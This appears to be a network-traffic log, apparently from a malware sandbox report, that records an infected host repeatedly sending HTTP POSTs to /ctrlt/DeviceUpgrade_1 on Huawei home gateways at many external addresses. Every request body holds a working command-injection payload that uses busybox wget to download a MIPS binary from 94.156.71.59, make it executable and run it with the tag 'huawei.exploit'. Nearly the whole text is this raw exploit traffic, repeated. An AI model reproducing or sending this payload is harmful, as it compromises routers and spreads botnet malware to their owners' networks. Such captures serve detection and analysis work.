                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            307192.168.2.1339526156.14.175.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.240544081 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            308192.168.2.1349198156.178.159.12837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.241406918 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            309192.168.2.134519841.188.47.4737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.242237091 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            310192.168.2.133472441.231.72.21637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.243236065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            311192.168.2.1338516197.161.103.24837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.243947983 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            312192.168.2.134754041.182.154.16437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.244657993 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            313192.168.2.1343920156.244.109.5637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.245474100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            314192.168.2.134115041.234.210.6637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.246351004 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            315192.168.2.135975241.215.9.13037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.247270107 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            316192.168.2.1334566156.132.214.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.248013973 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
